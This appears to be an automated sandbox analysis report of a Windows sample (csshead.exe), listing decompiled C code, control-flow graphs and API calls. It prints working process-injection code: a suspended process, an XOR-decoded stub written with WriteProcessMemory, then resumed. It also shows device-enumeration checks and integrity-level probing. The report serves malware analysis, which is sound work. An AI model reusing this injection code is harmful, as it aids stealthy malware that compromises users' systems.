    Function 00405026, Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 212threadprocessfile

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 1380 405026-40503c 1382 40503e-405046 GetModuleHandleA 1380->1382 1383 405049-40504d 1380->1383 1382->1383 1384 40504f-405053 1383->1384 1385 405061-40509d call 401258 CreateProcessA 1383->1385 1384->1385 1387 405055-40505e call 4012dc 1384->1387 1391 4050a3-40517f call 4010b4 call 401164 call 40133c CreateFileMappingA MapViewOfFile call 4012b8 * 2 call 4013b4 call 4012b8 1385->1391 1392 4052ce-4052d4 1385->1392 1387->1385 1407 405181-405185 1391->1407 1408 4051a5-4051e2 call 4012dc call 4012b8 call 404ef0 1391->1408 1410 40518c-4051a3 1407->1410 1416 4051e4-405211 call 401258 GetThreadContext 1408->1416 1417 405225-405229 1408->1417 1410->1408 1410->1410 1416->1417 1426 405213-40521a 1416->1426 1419 40522b-405233 call 404de0 1417->1419 1420 405236-40523a 1417->1420 1419->1420 1420->1392 1421 405240-405288 VirtualProtectEx WriteProcessMemory call 401828 ResumeThread 1420->1421 1429 4052b5-4052b7 1421->1429 1430 40528a-40529a WaitForSingleObject 1421->1430 1426->1417 1428 40521c-405222 1426->1428 1428->1417 1433 4052ba-4052c8 CloseHandle * 2 1429->1433 1431 40529c-4052aa GetExitCodeProcess 1430->1431 1432 4052ac-4052b3 1430->1432 1431->1433 1432->1433 1433->1392
    C-Code - Quality: 98%
    			E00405026(CHAR* _a4, struct HINSTANCE__* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, long _a24) {
				long _v8;
				void* _v12;
				void* _v16;
				long _v20;
				long _v24;
				void* _v28;
				signed int _v32;
				long _v36;
				long _v40;
				char _v44;
				struct _STARTUPINFOA _v112;
				void* _v124;
				struct _CONTEXT _v332;
				char _v353;
				signed int _t107;
				void* _t125;
				void* _t127;
				void* _t144;
				long _t154;

				_v8 = 0xffffffff;
				if(_a8 == 0) {
					_a8 = GetModuleHandleA(0);
				}
				if(_a16 != 0 && _a20 == 0xffffffff) {
					_a20 = E004012DC(_a16) + 1;
				}
				E00401258( &_v112, 0x44);
				_v112.cb = 0x44;
				_t107 = CreateProcessA(0, _a4, 0, 0, 0, 4, 0, 0,  &_v112,  &(_v332.ExtendedRegisters)); // executed
				asm("sbb eax, eax");
				_t109 =  ~( ~_t107);
				if( ~( ~_t107) == 0) {
					L23:
					return _v8;
				} else {
					E00401164(E004010B4(_t109, 0x44),  &_v353);
					E0040133C( &_v353, "_section");
					_v24 =  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x3c)) + _a8 + 0x50));
					_t125 = CreateFileMappingA(0xffffffff, 0, 4, 0, _v24 + 8 + _a20,  &_v353); // executed
					_v12 = _t125;
					_t127 = MapViewOfFile(_v12, 0xf001f, 0, 0, 0); // executed
					_v16 = _t127;
					E004012B8(_v16, _v24, _a8);
					 *((intOrPtr*)(_v16 + _v24)) = _a12 - _a8;
					 *((intOrPtr*)(_v16 + _v24 + 4)) = _a20;
					E004012B8(_v16 + _v24 + 8, _a20, _a16);
					_v24 = 0x29b;
					E004013B4( &_v28, _v24 + 0x11); // executed
					E004012B8(_v28, _v24, 0x40a2ac);
					_t144 = _v24 - 1;
					if(_t144 < 0) {
						L10:
						_v20 = E004012DC( &_v353) + 1;
						E004012B8(_v28 + _v24, _v20,  &_v353);
						_v24 = _v24 + _v20;
						_v40 = 0;
						_t154 = E00404EF0(_v332.ExtendedRegisters.hProcess, _t229); // executed
						_v40 = _t154;
						if(_v40 == 0) {
							E00401258( &_v332, 0xcc);
							_v332.ContextFlags = 0x10007;
							if(GetThreadContext(_v124,  &_v332) != 0 && _v332.Eax != 0) {
								_v40 = _v332.Eax;
							}
						}
						_t233 = _v40;
						if(_v40 == 0) {
							_v40 = E00404DE0(_v332.ExtendedRegisters.hProcess, _t233);
						}
						if(_v40 != 0) {
							VirtualProtectEx(_v332.ExtendedRegisters.hProcess, _v40, _v24, 0x40,  &_v36); // executed
							WriteProcessMemory(_v332.ExtendedRegisters.hProcess, _v40, _v28, _v24,  &_v20); // executed
							E00401828(_v28); // executed
							ResumeThread(_v124); // executed
							if(_a24 == 0) {
								__eflags = 0;
								_v8 = 0;
							} else {
								if(WaitForSingleObject(_v332.ExtendedRegisters.hProcess, _a24) != 0) {
									_v8 = 0xfffffffe;
								} else {
									GetExitCodeProcess(_v332.ExtendedRegisters.hProcess,  &_v8);
								}
							}
							CloseHandle(_v124);
							CloseHandle(_v332.ExtendedRegisters);
						}
						goto L23;
					}
					_v44 = _t144 + 1;
					_v32 = 0;
					do {
						 *(_v28 + _v32) =  *(_v28 + _v32) ^ 0x000000e4 + _v32 * 0xffffff9b;
						_v32 = _v32 + 1;
						_t55 =  &_v44;
						 *_t55 = _v44 - 1;
						_t229 =  *_t55;
					} while ( *_t55 != 0);
					goto L10;
				}
			}






















    0x00405031
    0x0040503c
    0x00405046
    0x00405046
    0x0040504d
    0x0040505e
    0x0040505e
    0x00405069
    0x0040506e
    0x0040508f
    0x00405097
    0x00405099
    0x0040509d
    0x004052ce
    0x004052d4
    0x004050a3
    0x004050ae
    0x004050bf
    0x004050d9
    0x004050f5
    0x004050fb
    0x0040510d
    0x00405113
    0x0040511f
    0x00405130
    0x0040513e
    0x0040514f
    0x00405154
    0x00405164
    0x00405174
    0x0040517c
    0x0040517f
    0x004051a5
    0x004051b1
    0x004051c3
    0x004051cb
    0x004051d0
    0x004051d6
    0x004051db
    0x004051e2
    0x004051ef
    0x004051f4
    0x00405211
    0x00405222
    0x00405222
    0x00405211
    0x00405225
    0x00405229
    0x00405233
    0x00405233
    0x0040523a
    0x00405252
    0x0040526c
    0x00405275
    0x0040527e
    0x00405288
    0x004052b5
    0x004052b7
    0x0040528a
    0x0040529a
    0x004052ac
    0x0040529c
    0x004052a4
    0x004052a4
    0x0040529a
    0x004052be
    0x004052c8
    0x004052c8
    0x00000000
    0x0040523a
    0x00405182
    0x00405185
    0x0040518c
    0x0040519a
    0x0040519d
    0x004051a0
    0x004051a0
    0x004051a0
    0x004051a0
    0x00000000
    0x0040518c

    APIs
    • GetModuleHandleA.KERNEL32(00000000), ref: 00405040
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0040508F
    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,?), ref: 004050F5
    • MapViewOfFile.KERNELBASE(?,000F001F,00000000,00000000,00000000), ref: 0040510D
      • Part of subcall function 004013B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 004013CD
      • Part of subcall function 00404EF0: ReadProcessMemory.KERNELBASE(?,00000000,?,00001000,?), ref: 00404F3A
      • Part of subcall function 00404EF0: ReadProcessMemory.KERNELBASE(?,00000000,?,00001000,?), ref: 00404F69
      • Part of subcall function 00404EF0: ReadProcessMemory.KERNEL32(00000000,00000000,?,00000018,?), ref: 00404FBC
      • Part of subcall function 00404EF0: ReadProcessMemory.KERNEL32(00000000,00000000,?,00001000,?), ref: 00404FED
    • GetThreadContext.KERNEL32(?,00010007), ref: 00405209
    • CloseHandle.KERNEL32(?), ref: 004052C8
      • Part of subcall function 00404DE0: NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 00404E09
      • Part of subcall function 00404DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00404E39
      • Part of subcall function 00404DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00404E5A
      • Part of subcall function 00404DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00404E7E
    • VirtualProtectEx.KERNELBASE(?,00000000,0000029B,00000040,?), ref: 00405252
    • WriteProcessMemory.KERNELBASE(?,00000000,?,0000029B,?), ref: 0040526C
      • Part of subcall function 00401828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00406A2F), ref: 0040183A
    • ResumeThread.KERNELBASE(?), ref: 0040527E
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 00405292
    • GetExitCodeProcess.KERNEL32(?,?), ref: 004052A4
    • CloseHandle.KERNEL32(?), ref: 004052BE
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00418480, Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 109registryclipboard

    Control-flow Graph

    APIs
    • RtlEnterCriticalSection.NTDLL(00442B64), ref: 0041848C
    • RegisterClipboardFormatA.USER32(WM_ATLGETHOST), ref: 0041849D
    • RegisterClipboardFormatA.USER32(WM_ATLGETCONTROL), ref: 004184A9
    • GetClassInfoExA.USER32(00442B90,AtlAxWin100,?), ref: 004184D0
    • LoadCursorA.USER32 ref: 0041850E
    • RegisterClassExA.USER32 ref: 00418531
    • GetClassInfoExA.USER32(00442B90,AtlAxWinLic100,?), ref: 0041857A
    • LoadCursorA.USER32 ref: 004185B2
    • RegisterClassExA.USER32 ref: 004185D5
    • RtlLeaveCriticalSection.NTDLL(00442B64), ref: 00418604
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00406ECE, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 163library

    Control-flow Graph

    C-Code - Quality: 66%
    			E00406ECE(signed char __eax, void* __ecx, void* __edx, void* __esi, char _a1) {
				intOrPtr _v4;
				void* _v8;
				void* _v12;
				struct HINSTANCE__* _v16;
				signed int _v20;
				void* _v28;
				CHAR* _v36;
				void* _v157;
				void* _v188;
				char* __ebp;
				void* _t115;

				_t115 = __ecx;
				_t57 = __eax;
				if(__esi + 1 <= 0) {
					L7:
					__eflags =  *(_t115 - 0x45ffffff) & _t57;
				} else {
					if(__eflags <= 0) {
						asm("lock lea eax, [ebp-0x209]");
						if(E00401110(__eax, _v16) != 0) {
							_v4 = 0xffffffff;
						}
						E00401440(_v16);
						return _v4;
					} else {
						asm("rol esi, 1");
						asm("sahf");
						asm("out 0x48, al");
						asm("salc");
						asm("sbb [eax], eax");
						__eax->i = __eax->i + __al;
						__dh = __dh + __al;
						asm("repne shl dl, 0x4a");
						__ebp =  &_a1;
						_push(es);
						asm("rol byte [fs:eax], 0x0");
						_push( &_a1);
						__ebp = __esp;
						__esp = __esp + 0xffffff44;
						__eax = 0;
						_v16 = 0;
						__eax =  *0x40a55c; // 0x406ed0
						_v36 = __eax;
						__eax = _v36;
						__eax = LoadLibraryA(_v36); // executed
						_v20 = __eax;
						__eax = _v36;
						__eax = E00401440(_v36);
						__eflags = _v20;
						if (_v20 == 0) goto L13;
						goto L7;
					}
				}
			}














    0x00406ece
    0x00406ece
    0x00406ed1
    0x00406f21
    0x00406f21
    0x00406ed3
    0x00406ed3
    0x00406ea5
    0x00406eb6
    0x00406eb8
    0x00406eb8
    0x00406ec2
    0x00406ecd
    0x00406ed5
    0x00406ed5
    0x00406ed7
    0x00406ed8
    0x00406eda
    0x00406edb
    0x00406edd
    0x00406edf
    0x00406ee1
    0x00406ee6
    0x00406ee7
    0x00406ee8
    0x00406eec
    0x00406eed
    0x00406eef
    0x00406ef5
    0x00406ef7
    0x00406efa
    0x00406f04
    0x00406f07
    0x00406f0b
    0x00406f11
    0x00406f14
    0x00406f17
    0x00406f1c
    0x00406f20
    0x00000000
    0x00406f20
    0x00406ed3

    APIs
      • Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
      • Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454
    • LoadLibraryA.KERNELBASE(?), ref: 00406F0B
    • SetupDiGetClassDevsA.SETUPAPI(0040A014,00000000,00000000,00000002), ref: 00406F79
    • SetupDiEnumDeviceInfo.SETUPAPI(?,?,0000001C), ref: 00406FA7
    • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(?,0000001C,00000000,?,00000000,00000081,?), ref: 00406FCE
    • CharLowerBuffA.USER32(00000000,00000000), ref: 00406FE7
    • SetupDiDestroyDeviceInfoList.SETUPAPI(?), ref: 00406FF1
    • SetupDiGetClassDevsA.SETUPAPI(0040A024,00000000,00000000,00000002), ref: 00407028
    • SetupDiEnumDeviceInfo.SETUPAPI(?,?,0000001C), ref: 00407056
    • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(?,0000001C,0000000C,?,00000000,00000081,?), ref: 0040707D
    • CharLowerBuffA.USER32(00000000,00000000), ref: 00407096
    • SetupDiDestroyDeviceInfoList.SETUPAPI(?), ref: 004070A0
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00424C01, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 98

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 1517 424c01-424c1f call 429ef0 GetStartupInfoW 1520 424c21-424c26 HeapSetInformation 1517->1520 1521 424c2c-424c38 1517->1521 1520->1521 1522 424c3a-424c3d 1521->1522 1523 424c3f-424c4e 1521->1523 1524 424c75-424c7c call 42769e 1522->1524 1523->1522 1525 424c50-424c5c 1523->1525 1530 424c7e-424c85 call 424bd8 1524->1530 1531 424c86-424c8d call 4260a2 1524->1531 1525->1522 1527 424c5e-424c65 1525->1527 1527->1522 1529 424c67-424c72 1527->1529 1529->1524 1530->1531 1536 424c8f-424c96 call 424bd8 1531->1536 1537 424c97-424ca6 call 42c2d2 call 42ce7d 1531->1537 1536->1537 1544 424ca8-424caf call 424664 1537->1544 1545 424cb0-424ccc GetCommandLineA call 42cde6 call 42cd2b 1537->1545 1544->1545 1552 424cce-424cd5 call 424664 1545->1552 1553 424cd6-424cdd call 42cab5 1545->1553 1552->1553 1558 424cdf-424ce6 call 424664 1553->1558 1559 424ce7-424cf1 call 424443 1553->1559 1558->1559 1564 424cfa-424d03 call 42ca56 1559->1564 1565 424cf3-424cf9 call 424664 1559->1565 1570 424d05-424d09 1564->1570 1571 424d0b-424d0d 1564->1571 1565->1564 1572 424d0e-424d16 call 419d20 1570->1572 1571->1572 1574 424d1b-424d21 1572->1574 1575 424d23-424d24 call 42461a 1574->1575 1576 424d29-424d6d call 424646 call 429f35 1574->1576 1575->1576
    APIs
    • GetStartupInfoW.KERNEL32(?,0043CD78,00000058), ref: 00424C11
    • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000), ref: 00424C26
      • Part of subcall function 0042769E: HeapCreate.KERNELBASE(00000000,00001000,00000000,00424C7A), ref: 004276A7
      • Part of subcall function 004260A2: GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00424C8B), ref: 004260AA
      • Part of subcall function 004260A2: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004260CC
      • Part of subcall function 004260A2: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004260D9
      • Part of subcall function 004260A2: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004260E6
      • Part of subcall function 004260A2: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004260F3
      • Part of subcall function 004260A2: TlsAlloc.KERNEL32(?,00424C8B), ref: 00426143
      • Part of subcall function 004260A2: TlsSetValue.KERNEL32(00000000,?,00424C8B), ref: 0042615E
      • Part of subcall function 004260A2: RtlEncodePointer.NTDLL ref: 00426179
      • Part of subcall function 004260A2: RtlEncodePointer.NTDLL ref: 00426186
      • Part of subcall function 004260A2: RtlEncodePointer.NTDLL ref: 00426193
      • Part of subcall function 004260A2: RtlEncodePointer.NTDLL ref: 004261A0
      • Part of subcall function 004260A2: RtlDecodePointer.NTDLL(Function_00015F05), ref: 004261C1
      • Part of subcall function 004260A2: RtlDecodePointer.NTDLL(00000000), ref: 004261F0
      • Part of subcall function 004260A2: GetCurrentThreadId.KERNEL32 ref: 00426202
    • __RTC_Initialize.LIBCMT ref: 00424C97
      • Part of subcall function 0042CE7D: GetStartupInfoW.KERNEL32(?), ref: 0042CE8A
      • Part of subcall function 0042CE7D: GetFileType.KERNEL32(?), ref: 0042CFBD
      • Part of subcall function 0042CE7D: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0), ref: 0042CFF3
      • Part of subcall function 0042CE7D: GetStdHandle.KERNEL32(-000000F6), ref: 0042D047
      • Part of subcall function 0042CE7D: GetFileType.KERNEL32(00000000), ref: 0042D059
      • Part of subcall function 0042CE7D: InitializeCriticalSectionAndSpinCount.KERNEL32(-00443954,00000FA0), ref: 0042D087
      • Part of subcall function 0042CE7D: SetHandleCount.KERNEL32 ref: 0042D0B0
    • __amsg_exit.LIBCMT ref: 00424CAA
    • GetCommandLineA.KERNEL32 ref: 00424CB0
      • Part of subcall function 0042CDE6: GetEnvironmentStringsW.KERNEL32 ref: 0042CDF0
      • Part of subcall function 0042CDE6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0042CE2E
      • Part of subcall function 0042CDE6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0042CE51
      • Part of subcall function 0042CDE6: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0042CE64
      • Part of subcall function 0042CDE6: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0042CE70
      • Part of subcall function 0042CD2B: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\csshead.exe,00000104), ref: 0042CD57
      • Part of subcall function 0042CD2B: _parse_cmdline.LIBCMT ref: 0042CD82
      • Part of subcall function 0042CD2B: _parse_cmdline.LIBCMT ref: 0042CDC3
    • __amsg_exit.LIBCMT ref: 00424CD0
      • Part of subcall function 0042CAB5: _strlen.LIBCMT ref: 0042CADF
      • Part of subcall function 0042CAB5: _strlen.LIBCMT ref: 0042CB10
    • __amsg_exit.LIBCMT ref: 00424CE1
      • Part of subcall function 00424443: __initterm_e.LIBCMT ref: 00424479
    • __amsg_exit.LIBCMT ref: 00424CF4
      • Part of subcall function 00419D20: CoInitialize.OLE32(00000000), ref: 00419D2C
      • Part of subcall function 00419D20: NtdllDefWindowProc_A.NTDLL(00000000,00000000,00000000,00000000), ref: 00419D3A
      • Part of subcall function 00419D20: GetCommandLineA.KERNEL32 ref: 00419DA4
      • Part of subcall function 00419D20: CreateMenu.USER32 ref: 00419EAE
      • Part of subcall function 00419D20: LoadMenuA.USER32(?,Menu), ref: 00419EC9
      • Part of subcall function 00419D20: LoadBitmapA.USER32(?,Bitmap), ref: 00419EDC
      • Part of subcall function 00419D20: AppendMenuA.USER32(00000000,00000014,?,00000000), ref: 00419EEC
      • Part of subcall function 00419D20: LoadMenuA.USER32(?,Edit), ref: 00419EFF
      • Part of subcall function 00419D20: BeginDeferWindowPos.USER32(00442A98), ref: 00419F07
      • Part of subcall function 00419D20: CreateMetaFileA.GDI32(?), ref: 00419F2B
      • Part of subcall function 00419D20: SetBrushOrgEx.GDI32(00000000,00000001,00000000,00000000), ref: 00419F3A
      • Part of subcall function 00419D20: LoadImageA.USER32(?,?,00000001,00000010,00000010,00000000), ref: 00419F6A
      • Part of subcall function 00419D20: FtpPutFileEx.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0041A00D
      • Part of subcall function 00419D20: GetSysColorBrush.USER32(0000000F), ref: 0041A084
      • Part of subcall function 00419D20: FrameRect.USER32(00000000,?,00000000), ref: 0041A094
      • Part of subcall function 00419D20: GlobalAlloc.KERNEL32(00001000,00000838), ref: 0041A0C0
      • Part of subcall function 00419D20: GetLastError.KERNEL32 ref: 0041A101
      • Part of subcall function 00419D20: GetIconInfo.USER32(00000000,?), ref: 0041A12D
      • Part of subcall function 00419D20: GetIconInfo.USER32(00000000,?), ref: 0041A14D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00407C4E, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 66file

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 1583 407c4e-407c7e 1586 407c9c-407ca0 1583->1586 1587 407c80-407c99 1583->1587 1588 407ca2-407cf0 ReadFile SetFilePointer ReadFile CloseHandle 1586->1588 1589 407cf3-407cf9 1586->1589 1587->1586 1588->1589
    C-Code - Quality: 100%
    			E00407C4E(CHAR* __eax) {
				CHAR* _v8;
				intOrPtr _v12;
				void* _v16;
				long _v20;
				intOrPtr _v24;
				void _v84;
				intOrPtr _v100;
				void _v104;
				void* _t24;

				_v8 = __eax;
				_v12 = 0;
				_t24 = CreateFileA(_v8, 0x80000000, 1, 0, 3, 0, 0); // executed
				_v16 = _t24;
				if(_v16 == 0xffffffff) {
					_v16 = CreateFileA(_v8, 0x80000000, 0, 0, 3, 0, 0);
				}
				if(_v16 != 0xffffffff) {
					ReadFile(_v16,  &_v84, 0x40,  &_v20, 0); // executed
					SetFilePointer(_v16, _v24 + 4, 0, 0); // executed
					ReadFile(_v16,  &_v104, 0x14,  &_v20, 0); // executed
					CloseHandle(_v16);
					_v12 = _v100;
				}
				return _v12;
			}












    0x00407c56
    0x00407c5b
    0x00407c71
    0x00407c77
    0x00407c7e
    0x00407c99
    0x00407c99
    0x00407ca0
    0x00407cb2
    0x00407cc7
    0x00407cdd
    0x00407ce7
    0x00407cf0
    0x00407cf0
    0x00407cf9

    APIs
    • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00407C71
    • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00407C93
    • ReadFile.KERNELBASE(000000FF,?,00000040,?,00000000), ref: 00407CB2
    • SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000), ref: 00407CC7
    • ReadFile.KERNELBASE(000000FF,?,00000014,?,00000000), ref: 00407CDD
    • CloseHandle.KERNEL32(000000FF), ref: 00407CE7
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00407C50, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 65file

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 1591 407c50-407c7e 1593 407c9c-407ca0 1591->1593 1594 407c80-407c99 1591->1594 1595 407ca2-407cf0 ReadFile SetFilePointer ReadFile CloseHandle 1593->1595 1596 407cf3-407cf9 1593->1596 1594->1593 1595->1596
    C-Code - Quality: 100%
    			E00407C50(CHAR* __eax) {
				CHAR* _v8;
				intOrPtr _v12;
				void* _v16;
				long _v20;
				intOrPtr _v24;
				void _v84;
				intOrPtr _v100;
				void _v104;
				void* _t24;

				_v8 = __eax;
				_v12 = 0;
				_t24 = CreateFileA(_v8, 0x80000000, 1, 0, 3, 0, 0); // executed
				_v16 = _t24;
				if(_v16 == 0xffffffff) {
					_v16 = CreateFileA(_v8, 0x80000000, 0, 0, 3, 0, 0);
				}
				if(_v16 != 0xffffffff) {
					ReadFile(_v16,  &_v84, 0x40,  &_v20, 0); // executed
					SetFilePointer(_v16, _v24 + 4, 0, 0); // executed
					ReadFile(_v16,  &_v104, 0x14,  &_v20, 0); // executed
					CloseHandle(_v16);
					_v12 = _v100;
				}
				return _v12;
			}












    0x00407c56
    0x00407c5b
    0x00407c71
    0x00407c77
    0x00407c7e
    0x00407c99
    0x00407c99
    0x00407ca0
    0x00407cb2
    0x00407cc7
    0x00407cdd
    0x00407ce7
    0x00407cf0
    0x00407cf0
    0x00407cf9

    APIs
    • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00407C71
    • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00407C93
    • ReadFile.KERNELBASE(000000FF,?,00000040,?,00000000), ref: 00407CB2
    • SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000), ref: 00407CC7
    • ReadFile.KERNELBASE(000000FF,?,00000014,?,00000000), ref: 00407CDD
    • CloseHandle.KERNEL32(000000FF), ref: 00407CE7
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 004042D4, Relevance: 10.6, APIs: 7, Instructions: 101

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 1598 4042d4-4042fa OpenProcessToken 1599 4043f9-404405 1598->1599 1600 404300-40431c GetTokenInformation 1598->1600 1601 404322-40432b GetLastError 1600->1601 1602 4043ef-4043f3 CloseHandle 1600->1602 1601->1602 1603 404331-404340 call 4013dc 1601->1603 1602->1599 1603->1602 1606 404346-404366 GetTokenInformation 1603->1606 1607 404368-40437b GetSidSubAuthorityCount 1606->1607 1608 4043e7-4043ea call 401440 1606->1608 1607->1608 1610 40437d-404383 1607->1610 1608->1602 1610->1608 1611 404385-4043a0 GetSidSubAuthority 1610->1611 1611->1608 1612 4043a2-4043b1 1611->1612 1613 4043b3-4043ba 1612->1613 1614 4043bc-4043c3 1612->1614 1613->1608 1615 4043d7-4043de 1614->1615 1616 4043c5-4043cc 1614->1616 1615->1608 1618 4043e0 1615->1618 1616->1615 1617 4043ce-4043d5 1616->1617 1617->1608 1618->1608
    C-Code - Quality: 88%
    			E004042D4(void* __eax) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				long _v24;
				void** _v28;
				intOrPtr _v32;
				char* _v36;
				intOrPtr* _v40;
				signed int _t40;
				signed int _t47;
				signed int _t59;

				_v8 = __eax;
				_v16 = 0;
				_t40 = OpenProcessToken(_v8, 8,  &_v20);
				asm("sbb eax, eax");
				if( ~( ~_t40) == 0) {
					L17:
					_v12 = _v16;
					return _v12;
				}
				_t47 = GetTokenInformation(_v20, 0x19, 0, 0,  &_v24); // executed
				asm("sbb eax, eax");
				if( ~( ~_t47) != 0 || GetLastError() != 0x7a) {
					L16:
					CloseHandle(_v20);
					goto L17;
				} else {
					_v28 = E004013DC(_v24);
					if(_v28 == 0) {
						goto L16;
					}
					_t59 = GetTokenInformation(_v20, 0x19, _v28, _v24,  &_v24); // executed
					asm("sbb eax, eax");
					if( ~( ~_t59) != 0) {
						_v36 = GetSidSubAuthorityCount( *_v28);
						if(_v36 != 0 &&  *_v36 > 0) {
							_v40 = GetSidSubAuthority( *_v28, ( *_v36 & 0x000000ff) - 1);
							if(_v40 != 0) {
								_v32 =  *_v40;
								if(_v32 >= 0x2000) {
									if(_v32 < 0x2000 || _v32 >= 0x3000) {
										if(_v32 >= 0x3000) {
											_v16 = 3;
										}
									} else {
										_v16 = 2;
									}
								} else {
									_v16 = 1;
								}
							}
						}
					}
					E00401440(_v28);
					goto L16;
				}
			}















    0x004042da
    0x004042df
    0x004042ec
    0x004042f4
    0x004042fa
    0x004043f9
    0x004043fc
    0x00404405
    0x00404405
    0x0040430e
    0x00404316
    0x0040431c
    0x004043ef
    0x004043f3
    0x00000000
    0x00404331
    0x00404339
    0x00404340
    0x00000000
    0x00000000
    0x00404358
    0x00404360
    0x00404366
    0x00404374
    0x0040437b
    0x00404399
    0x004043a0
    0x004043a7
    0x004043b1
    0x004043c3
    0x004043de
    0x004043e0
    0x004043e0
    0x004043ce
    0x004043ce
    0x004043ce
    0x004043b3
    0x004043b3
    0x004043b3
    0x004043b1
    0x004043a0
    0x0040437b
    0x004043ea
    0x00000000
    0x004043ea

    APIs
    • OpenProcessToken.ADVAPI32(?,00000008,?), ref: 004042EC
    • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 0040430E
    • GetLastError.KERNEL32 ref: 00404322
      • Part of subcall function 004013DC: GetProcessHeap.KERNEL32(00000000,?), ref: 004013EB
      • Part of subcall function 004013DC: RtlAllocateHeap.NTDLL(00000000), ref: 004013F2
    • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 00404358
    • GetSidSubAuthorityCount.ADVAPI32(?), ref: 0040436E
    • GetSidSubAuthority.ADVAPI32(?,?), ref: 00404393
      • Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
      • Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454
    • CloseHandle.KERNEL32(?), ref: 004043F3
